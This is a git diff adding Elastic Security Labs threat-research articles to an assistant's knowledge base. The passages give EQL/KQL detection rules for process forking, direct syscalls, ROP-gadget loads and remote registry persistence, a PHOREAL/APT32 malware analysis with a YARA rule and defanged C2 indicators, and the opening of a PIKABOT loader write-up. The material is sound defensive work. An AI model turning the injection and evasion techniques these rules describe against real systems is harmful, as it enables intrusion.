+This process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to **zipfld.dll** (Zipped Folders Shell Extension): 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image20.png)
+
+## Detection Examples 
+Now that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.
+
+### Process 
+
+#### Suspicious Process Creation via Reflection
+[Dirty Vanity](https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass) is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any [inheritable](https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance) handles therein. 
+
+When executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Using process creation notification [callbacks](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex) won’t log forked processes because the forked process initial thread isn’t executed. But in the case of this injection technique, the forked process will be injected and a thread will be started, which triggers the process start event log with the following call stack: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image6.png)
+
+We can see the call to **RtlCreateProcessReflection** and **RtlCloneUserProcess** to fork the process. Now we know that this is a forked process, and the next question is “Is this common in normal conditions?” While diagnostically this behavior appears to be common and alone, it is not a strong signal of something malicious. Checking further to see if the forked processes perform any network connections, loads DLLs, or spawns child processes revealed to be less common and made for good detections: 
+
+```
+// EQL detecting a forked process spawning a child process - very suspicious
+
+process where event.action == "start" and
+
+descendant of 
+   [process where event.action == "start" and 
+   _arraysearch(process.parent.thread.Ext.call_stack, $entry, 
+   $entry.symbol_info: 
+    ("*ntdll.dll!RtlCreateProcessReflection*", 
+    "*ntdll.dll!RtlCloneUserProcess*"))] and
+
+not (process.executable : 
+      ("?:\\WINDOWS\\SysWOW64\\WerFault.exe", 
+      "?:\\WINDOWS\\system32\\WerFault.exe") and
+     process.parent.thread.Ext.call_stack_summary : 
+      "*faultrep.dll|wersvc.dl*")
+```
+
+```
+// EQL detecting a forked process loading a network DLL 
+//  or performs a network connection - very suspicious
+
+sequence by process.entity_id with maxspan=1m
+ [process where event.action == "start" and
+  _arraysearch(process.parent.thread.Ext.call_stack, 
+  $entry, $entry.symbol_info: 
+    ("*ntdll.dll!RtlCreateProcessReflection*", 
+    "*ntdll.dll!RtlCloneUserProcess*"))]
+ [any where
+  (
+   event.category : ("network", "dns") or 
+   (event.category == "library" and 
+    dll.name : ("ws2_32.dll", "winhttp.dll", "wininet.dll"))
+  )]
+```
+
+Here’s an example of forking **explore.exe** and executing shellcode that spawns **cmd.exe** from the forked **explorer.exe** instance:
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image13.png)
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image14.png)
+
+### Direct Syscall via Assembly Bytes
+The second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the **NtCreateProcess** API. Adversaries may use [this method](https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs) to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):
+
+```
+process where event.action : "start" and 
+
+// EQL detecting a call stack not ending with ntdll.dll 
+not process.parent.thread.Ext.call_stack_summary : "ntdll.dll*" and 
+
+/* last call in the call stack contains bytes that execute a syscall
+ manually using assembly <mov r10,rcx, mov eax,ssn, syscall> */
+
+_arraysearch(process.parent.thread.Ext.call_stack, $entry,
+ ($entry.callsite_leading_bytes : ("*4c8bd1b8??????000f05", 
+ "*4989cab8??????000f05", "*4c8bd10f05", "*4989ca0f05")))
+```
+ 
+This example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (**0F05**):
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image16.png)
+
+## File
+
+### Suspicious Microsoft Office Embedded Object
+The following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image7.png)
+
+```
+// EQL detecting file creation event with call stack indicating 
+// OleSaveToStream call to save or load the embedded OLE object
+
+file where event.action != "deletion" and 
+
+process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
+
+_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:
+ ("*!OleSaveToStream*", "*!OleLoad*")) and
+(
+ file.extension : ("exe", "dll", "js", "vbs", "vbe", "jse", "url", 
+ "chm", "bat", "mht", "hta", "htm", "search-ms") or
+
+ /* PE & HelpFile */
+ file.Ext.header_bytes : ("4d5a*", "49545346*")
+ )
+```
+
+Example of matches : 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image9.png)
+
+### Suspicious File Rename from Unbacked Memory
+Certain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following KQL query looks for file rename of documents, from a signed binary and with a suspicious call stack: 
+
+```
+file where event.action : "rename" and 
+  
+process.code_signature.status : "trusted" and file.extension != null and 
+
+file.Ext.original.name : ("*.jpg", "*.bmp", "*.png", "*.pdf", "*.doc", 
+"*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx") and
+
+not file.extension : ("tmp", "~tmp", "diff", "gz", "download", "bak", 
+"bck", "lnk", "part", "save", "url", "jpg",  "bmp", "png", "pdf", "doc", 
+"docx", "xls", "xlsx", "ppt", "pptx") and 
+
+process.thread.Ext.call_stack_summary :
+("ntdll.dll|kernelbase.dll|Unbacked",
+ "ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked", 
+ "ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll", 
+ "ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll", 
+ "ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll", 
+ "ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked", 
+ "ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|
+ Unbacked", "ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|
+ kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll", 
+ "ntdll.dll|Unbacked", "Unbacked", "Unknown")
+ ```
+ 
+ Here are some examples of matches where **explorer.exe** (Windows Explorer) is injected by the [KNIGHT/CYCLOPS](https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/) ransomware: 
+ 
+ ![](/assets/images/peeling-back-the-curtain-with-call-stacks/image30.png)
+
+### Executable File Dropped by an Unsigned Service DLL
+Certain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named **ServiceMain**. The KQL query below helps identify instances where an executable file is created, and the call stack includes the **ServiceMain** function.
+
+```
+event.category : file and 
+ file.Ext.header_bytes :4d5a* and process.name : svchost.exe and 
+ process.thread.Ext.call_stack.symbol_info :*!ServiceMain*
+```
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image3.png)
+
+## Library
+
+### Unsigned Print Monitor Driver Loaded
+The following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from **SplAddMonitor**. Adversaries may use [port monitors](https://attack.mitre.org/techniques/T1547/010/) to run an adversary-supplied DLL during system boot for persistence or privilege escalation.
+
+```
+library where
+process.executable : ("?:\\Windows\\System32\\spoolsv.exe", 
+"?:\\Windows\\SysWOW64\\spoolsv.exe") and not dll.code_signature.status : 
+"trusted" and _arraysearch(process.thread.Ext.call_stack, $entry, 
+$entry.symbol_info: "*localspl.dll!SplAddMonitor*")
+```
+
+Example of match: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image5.png)
+
+### Potential Library Load via ROP Gadgets
+This EQL rule identifies the loading of a library from unusual **win32u** or **ntdll** offsets. This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.
+
+```
+library where
+// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll 
+// to construct a normal-looking call stack
+
+process.thread.Ext.call_stack_summary : ("ntdll.dll|*", "win32u.dll|*") and 
+
+// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection
+not _arraysearch(process.thread.Ext.call_stack, $entry, 
+ $entry.symbol_info: ("*ntdll.dll!Ldr*", 
+ "*KernelBase.dll!LoadLibrary*", "*ntdll.dll!*MapViewOfSection*"))
+```
+
+This example matches when [AtomLdr](https://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html) loads a DLL using ROP gadgets from **win32u.dll** instead of using **ntdll**’s load library APIs (**LdrLoadDll** and **NtMapViewOfSection**).
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image1.png)
+
+### Evasion via LdrpKernel32 Overwrite
+The [LdrpKernel32(https://github.com/rbmm/LdrpKernel32DllName) evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in **ntdll.dll** memory– forcing the process to load a malicious DLL. 
+
+```
+library where 
+ 
+// BaseThreadInitThunk must be exported by the rogue bootstrap DLL
+ _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :
+  "*!BaseThreadInitThunk*") and
+
+// excluding kernel32 that exports normally exports BasethreadInitThunk
+not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info
+ ("?:\\Windows\\System32\\kernel32.dll!BaseThreadInitThunk*", 
+ "?:\\Windows\\SysWOW64\\kernel32.dll!BaseThreadInitThunk*", 
+ "?:\\Windows\\WinSxS\\*\\kernel32.dll!BaseThreadInitThunk*", 
+ "?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\*!BaseThreadInitThunk*", 
+ "\\Device\\*\\Windows\\*\\kernel32.dll!BaseThreadInitThunk*"))
+```
+
+Example of match: 
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image15.png)
+
+## Suspicious Remote Registry Modification
+Similar to the scheduled task example, the remote registry service is hosted in **svchost.exe**. We can use the call stack to detect registry modification by monitoring when the Remote Registry service points to an executable or script file. This may indicate an attempt to move laterally via remote configuration changes.
+
+```
+registry where 
+
+event.action == "modification" and 
+
+user.id : ("S-1-5-21*", "S-1-12-*") and 
+
+ process.name : "svchost.exe" and 
+
+// The regsvc.dll in call stack indicate that this is indeed the 
+// svchost.exe instance hosting the Remote registry service
+
+process.thread.Ext.call_stack_summary : "*regsvc.dll|rpcrt4.dll*" and
+
+ (
+  // suspicious registry values
+  registry.data.strings : ("*:\\*\\*", "*.exe*", "*.dll*", "*rundll32*", 
+  "*powershell*", "*http*", "* /c *", "*COMSPEC*", "\\\\*.*") or
+  
+  // suspicious keys like Services, Run key and COM
+  registry.path :
+         ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL",
+          "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath",
+          "HKEY_USERS\\*Classes\\*\\InprocServer32\\",
+          "HKEY_USERS\\*Classes\\*\\LocalServer32\\",
+          "H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*") or
+  
+  // potential attempt to remotely disable a service 
+  (registry.value : "Start" and registry.data.strings : "4")
+  )
+```
+
+This example matches when the Run key registry value is modified remotely via the Remote Registry service: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image11.png)
+
+## Conclusion
+As we’ve demonstrated, call stacks are not only useful for finding known bad patterns, but also for reducing ambiguity in standard EDR events, and easing behavior interpretation. The examples we've provided here represent just a minor portion of the potential detection possibilities achievable by applying enhanced enrichment to the same dataset.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/phoreal_malware_targets_the_southeast_asian_financial_sector.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/phoreal_malware_targets_the_southeast_asian_financial_sector.md
new file mode 100644
index 0000000000000..4da0e63e1c4e6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/phoreal_malware_targets_the_southeast_asian_financial_sector.md
@@ -0,0 +1,360 @@
+---
+title: "PHOREAL Malware Targets the Southeast Asian Financial Sector"
+slug: "phoreal-malware-targets-the-southeast-asian-financial-sector"
+date: "2023-03-02"
+description: "Elastic Security discovered PHOREAL malware, which is targeting Southeast Asia financial organizations, particularly those in the Vietnamese financial sector."
+author:
+  - slug: daniel-stepanic
+  - slug: derek-ditch
+  - slug: joe-desimone
+  - slug: remco-sprooten
+  - slug: andrew-pease
+  - slug: cyril-francois
+image: "blog-thumb-roman-columns.jpg"
+category:
+  - slug: campaigns
+tags:
+  - phoreal
+  - rizzo
+  - malware
+  - backdoor
+---
+
+## Preamble
+
+Elastic Security has identified an ongoing campaign targeting a Vietnamese financial services institution with the PHOREAL/RIZZO backdoor. While this malware has been in use for some time, this is the first time that we have observed it loading into memory as a defense evasion and campaign protection technique. Upon analysis of our own observations and previously reported information, we are tracking this activity group (malware + technique + victimology) as REF4322.
+
+### What is the threat?
+
+PHOREAL/RIZZO is a backdoor allowing initial victim characterization and follow-on post-exploitation operations to compromise the confidentiality of organizations’ data. It has been reported in other research as being used exclusively by APT32 (AKA SeaLotus, OceanLotus, APT-C-00, Group G0050).
+
+### What is the impact?
+
+APT32 largely targets victims with political or economic interests in Southeast Asia, specifically Vietnam.
+
+### What is Elastic doing about it?
+
+Elastic Security detailed how to triage one of these threat alerts, extracted observables for endpoint and network filtering, and produced a new malware signature for identification and mitigation of the threat across the fleet of deployed Elastic Agents.
+
+## Investigation Details
+
+While conducting Threat Discovery & Monitoring operations, Elastic Security researchers identified a cluster of shellcode_thread Windows memory protection alerts generated from an Elastic Agent endpoint sensor. These particular alerts were interesting because they all occurred within the same cluster, and unusually they targeted the control.exe process. The Windows control.exe process handles the execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
+
+Generally when we observe false positives for the shellcode_thread protection, it is identified across a broad user-base and in many cases it is attributed to various gaming anti-cheat or DRM (Digital Rights Management) mechanisms. In this case, a single cluster and a Microsoft signed target process was atypical, and worthy of further investigation.
+
+> You can read more about Elastic Security’s memory protections&nbsp;[HERE](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0#:~:text=Memory%20threat%20protection%20for%20Windows%20endpoints)&nbsp;and about in-memory attacks&nbsp;[HERE](https://www.elastic.co/blog/hunting-memory).
+
+With our interest piqued from the outlier characteristics of the alerts, we investigated further to validate and characterize the threat:
+
+**Targeted process is a signed Windows binary**
+
+```
+...
+"process": {
+     "args": [
+       "control.exe",
+       "Firewall.cpl",
+       "{2D48D219-C306-4349-AE1F-09744DFFB5B9}"
+     ],
+     "Ext": {
+       "code_signature": [
+         {
+           "trusted": true,
+           "subject_name": "Microsoft Windows",
+           "exists": true,
+           "status": "trusted"
+         }
+       ],
+       "dll": [
+...
+
+```
+
+**Unsigned loaded .dll**
+
+```
+...
+   "Ext": {
+     "mapped_address": 1945501696,
+     "mapped_size": 21135360
+   },
+   "path": "C:\\Windows\\SysWOW64\\tscon32.dll",
+   "code_signature": [
+     {
+       "exists": false
+     }
+   ],
+   "name": "tscon32.dll",
+   "hash": {
+     "sha1": "007970b7a42852b55379ef4cffa4475865c69d48",
+     "sha256": "ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33",
+     "md5": "2b6da20e4fc1af2c5dd5c6f6191936d1"
+   }
+ },
+...
+
+```
+
+**Starting module from the alerting thread**
+
+```
+...
+ "pe": {
+   "original_file_name": "CONTROL.EXE"
+ },
+ "name": "control.exe",
+ "pid": 5284,
+ "thread": {
+   "Ext": {
+     "start_address_module": "C:\\Windows\\SysWOW64\\tscon32.dll",
+...
+
+```
+
+**Alerting memory region metadata**
+
+```
+...
+"memory_region": {`
+   "region_size": 73728,
+   "region_protection": "RWX",
+   "allocation_base": 81395712,
+   "bytes_allocation_offset": 0,
+   "allocation_type": "PRIVATE",
+   "memory_pe_detected": true,
+   "region_state": "COMMIT",
+   "strings": [
+     "QSSSSSSh ",
+     ...
+     "bad cast",
+     "Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}",
+     "Netapi32.dll",
+     "NetWkstaGetInfo",
+     "NetApiBufferFree",
+     "\\\\.\\pipe\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}",
+     "list<T> too long",
+     "{FD5F8447-657A-45C1-894B-D533926C9B66}.dll",
+     "DllEntry",
+     ...
+     ".?AVbad_alloc@std@@",
+     "C:\\Windows\\syswow64\\control.exe",
+     ":z:zzzzzz7",
+     ...
+     "InternalName",
+     "mobsync.exe",
+     "LegalCopyright",
+...
+
+```
+
+**Thread data for pivoting**
+
+```
+...
+"thread": {
+ "Ext": {
+   "start_address_bytes": "8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300",
+   ...
+   "start_address_bytes_disasm": "mov edi, edi\npush ebp\nmov ebp, esp\ncall 0x000043f0\ncall 0x000043ea\npush eax\ncall 0x000043d0\ntest eax, eax\njnz 0x00000038\npush dword ptr [ebp+0x08]"
+ },
+...
+
+```
+
+From the example alert we first identify the start_address_module which is the dll/module where the thread began. C:\\Windows\\SysWOW64\\tscon32.dll is the start_address_module for the thread that we’ve alerted on. It’s also the only unsigned dll loaded, so a great place to focus our efforts. When checking the hash value in VirusTotal, to identify previously disclosed information about the sample, we did not see any results.
+
+Digging deeper, we looked at the start_address_bytes, which are the first 32 bytes of our alerting thread. We can use the value of the start_address_bytes (8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300) to search for pivots in VirusTotal by querying content: \{8bff558bec56e83f3e0000e8343e000050e8143e000085c0752a8b750856e821\}. We identified relatively few results, but they included [the below entry](https://www.virustotal.com/gui/file/88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de) first submitted in July 2021.
+
+![VT result matching `start_address_bytes`](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/VT_result_matching_start_address_bytes_.jpg)
+
+In researching the results from VirusTotal, we could see that threat researcher Felix Bilstein ([@fxb_b](https://twitter.com/fxb_b)) authored a crowdsourced YARA rule identifying this as the [PHOREAL](https://attack.mitre.org/software/S0158/) backdoor. Moving on to the CONTENT tab, we can compare some of the strings from our alert with what has been previously reported to VirusTotal.
+
+![VT result CONTENT tab](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/VT_result_CONTENT_tab.jpg)
+
+Using the unique strings we identified above and the start_address_bytes, we can create a YARA signature by converting the unique strings ($a) and the start\_address\_bytes ($b) into hex values as shown below.
+
+**Converted YARA strings**
+
+```
+strings:
+          \\  "\\.\pipe\{A06F176F-79F1-473E-AF44-9763E3CB34E5}"  ascii wide
+    $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00
+            30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00
+            31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00
+            2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00
+            45 00 35 00 7D 00 }
+
+          \\  "Local\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}"  ascii wide
+    $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00
+            33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00
+            32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00
+            37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }
+
+          \\  "{FD5F8447-657A-45C1-894B-D533926C9B66}.dll"  ascii
+    $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39
+            34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }
+
+          \\  PHOREAL start_address_bytes sequence
+          \\  mov edi, edi; push ebp; mov ebp, esp; call 0x000043f0;
+          \\  call 0x000043ea; push eax; call 0x000043d0; test eax, eax;
+          \\  jnz 0x00000038; push dword ptr [ebp+0x08]
+    $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E
+            00 00 85 C0 75 2A 8B 75 08 56 E8 21 }
+condition:
+    2 of them
+
+```
+
+This rule when deployed to the Elastic Agent will identify PHOREAL to customers and backstop prevention already provided through the shellcode_thread memory protection (in customer environments with memory protection turned on). In our case this rule’s deployment also enabled the collection of the malicious thread using the same mechanism detailed in our [Collecting Cobalt Strike Beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) article.
+
+Shortly after the new YARA artifact was deployed we had a new malware_signature alert in hand with the malicious thread captured from memory. Manual binary triage from our Malware Analysis and Reverse Engineering (MARE) Team quickly confirmed the sample was PHOREAL/RIZZO by comparing the structure and functions between our sample and past reporting. Further, they were able to extract an RC4 encrypted domain from an [RCDATA resource](https://docs.microsoft.com/en-us/windows/win32/menurc/rcdata-resource) as described in a [2018 CYLANCE OceanLotus whitepaper](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf).
+
+![RC4 decrypting binary embedded URL](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/RC4_decrypting_binary_embedded_URL.jpg)
+
+The domain identified by MARE (thelivemusicgroup[.]com) currently resolves to 103.75.117[.]250 which is owned by Oneprovider[.]com, a dedicated server hosting company based out of Canada with data centers distributed globally.
+
+**https://ipinfo.io/ query results for 103.75.117[.]250**
+
+```
+{
+  "ip": "103.75.117[.]250",
+  "city": "Hong Kong",
+  "region": "Central and Western",
+  "country": "HK",
+  "loc": "22.2783,114.1747",
+  "org": "AS133752 Leaseweb Asia Pacific pte. ltd.",
+  "timezone": "Asia/Hong_Kong",
+  "asn": {
+    "asn": "AS133752",
+    "name": "Leaseweb Asia Pacific pte. ltd.",
+    "domain": "leaseweb.com",
+    "route": "103.75.117[.]0/24",
+    "type": "hosting"
+  },
+  "company": {
+    "name": "Oneprovider.com - Hong Kong Infrastructure",
+    "domain": "oneprovider[.]com",
+    "type": "hosting"
+  },
+  "privacy": {
+    "vpn": false,
+    "proxy": false,
+    "tor": false,
+    "relay": false,
+    "hosting": true,
+    "service": ""
+  },
+  "abuse": {
+    "address": "1500 Ste-Rose LAVAL H7R 1S4 Laval Quebec, Canada",
+    "country": "CA",
+    "email": "info@oneprovider.com",
+    "name": "ONE PROVIDER",
+    "network": "103.75.117[.]0/24",
+    "phone": "+1 514 286-0253"
+  },
+  "domains": {
+    "ip": "103.75.117[.]250",
+    "total": 2,
+    "domains": [
+      "thelivemusicgroup[.]com",
+      "cdn-api-cn-1[.]com"
+    ]
+  }
+
+```
+
+Most of the interesting information about the domain is privacy guarded, but the “Updated” and “Created” dates in the below figure might be useful for bounding how long this domain has been used maliciously.
+
+![https://lookup.icann.org/lookup for thelivemusicgroup[.]com](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/https-lookup.jpg)
+
+The Elastic Agent appears to have been deployed post-compromise which limited our ability to determine the vector of initial access. A [2017 Mandiant report](https://www.mandiant.com/resources/cyber-espionage-apt32) indicates that PHOREAL may be deployed in an “establish foothold” capacity to allow for victim triage and follow-on post-exploitation tools.
+
+## Analysis
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries and victims of intrusions.
+
+![REF4322 Diamond Model Analysis](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/REF4322_Diamond_Model_Analysis.png)
+
+### Adversary Assessment Justification
+
+We assess with high confidence based on observed activity and previous reporting that REF4322 is [APT32/OceanLotus](https://attack.mitre.org/groups/G0050/) and the actor behind this incident. APT32 has been active since 2014 [notably targeting](https://www.mandiant.com/resources/cyber-espionage-apt32) Southeast Asian governments and businesses or other international businesses with interests in Vietnam. APT32 is the only group currently identified as operating the PHOREAL backdoor, and our victim matches the geographic and industry vertical profile of typical and specific prior APT32 victims.
+
+## Conclusion
+
+### YARA Rules
+
+We have created a YARA rule to identify this PHOREAL activity.
+
+**Yara rule to detect REF4322/APT32 in-memory backdoor PHOREAL/Rizzo**
+
+```
+rule Windows_Trojan_PHOREAL {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-02-16"
+        last_modified = "2022-02-16"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "PHOREAL"
+        threat_name = "Windows.Trojan.PHOREAL"
+        description = "Detects REF4322/APT32 in-memory backdoor PHOREAL/Rizzo."
+        reference_sample = "88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de"
+
+
+    strings:
+              \\  "\\.\pipe\{A06F176F-79F1-473E-AF44-9763E3CB34E5}"  ascii wide
+        $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00
+                30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00
+                31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00
+                2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00
+                45 00 35 00 7D 00 }
+
+              \\  "Local\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}"  ascii wide
+        $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00
+                33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00
+                32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00
+                37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }
+
+              \\  "{FD5F8447-657A-45C1-894B-D533926C9B66}.dll"  ascii
+        $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39
+                34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }
+
+              \\  PHOREAL start_address_bytes sequence
+        $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E
+                00 00 85 C0 75 2A 8B 75 08 56 E8 21 }
+    condition:
+        2 of them
+}
+
+```
+
+### Defensive Recommendations
+
+The following steps can be leveraged to improve a network’s protective posture:
+
+1. Enable Elastic Security Memory Protection on Windows endpoints
+2. Leverage the included YARA signatures above to determine if PHOREAL activity exists within your organization
+3. Monitor or block network traffic to or from identified network IOCs and remediate impacted systems accordingly.
+
+### References
+
+The following research was referenced throughout the document:
+
+- [https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf)
+- [https://www.mandiant.com/resources/cyber-espionage-apt32](https://www.mandiant.com/resources/cyber-espionage-apt32)
+- [https://www.secureworks.com/research/threat-profiles/tin-woodlawn](https://www.secureworks.com/research/threat-profiles/tin-woodlawn)
+- [https://attack.mitre.org/software/S0158/](https://attack.mitre.org/software/S0158/)
+- [https://attack.mitre.org/groups/G0050/](https://attack.mitre.org/groups/G0050/)
+
+### Observables
+
+| Indicator                                                        | Type        | Reference   | Notes                                  |
+| ---------------------------------------------------------------- | ----------- | ----------- | -------------------------------------- |
+| thelivemusicgroup[.]com                                          | domain-name |             | C2 domain encrypted in malware         |
+| 103.75.117[.]250                                                 | ipv4-addr   |             | Resolved IP of thelivemusicgroup[.]com |
+| ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33 | SHA256      | tscon32.dll | PHOREAL dll                            |
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltecdb2d74a5c6ce1b/628e88d96f81705517a1f25b/phoreal-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/pikabot_i_choose_you.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/pikabot_i_choose_you.md
new file mode 100644
index 0000000000000..79bad2ed1b70b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/pikabot_i_choose_you.md
@@ -0,0 +1,488 @@
+---
+title: "PIKABOT, I choose you!"
+slug: "pikabot-i-choose-you"
+date: "2024-02-24"
+description: "Elastic Security Labs observed new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads."
+author:
+  - slug: daniel-stepanic
+  - slug: salim-bitam
+image: "photo-edited-02.png"
+category:
+  - slug: campaigns
+tags:
+  - pikabot
+  - loader
+  - syscalls
+---
+
+## PIKABOT at a glance
+
+PIKABOT is a widely deployed loader malicious actors utilize to distribute payloads such as Cobalt Strike or launch ransomware. On February 8th, the Elastic Security Labs team observed new PIKABOT campaigns, including an updated variant. This version of the PIKABOT loader uses a new unpacking method and heavy obfuscation. The core module has added a new string decryption implementation, changes to obfuscation functionality, and various other modifications.
+
+
+This post will highlight the initial campaign, break down the new loader functionality,  and review the core components. There are interesting design choices in this new update that we think are the start of a new codebase that will make further improvements over time. While the functionality is similar to previous builds, these new updates have likely broken signatures and previous tooling.  
+
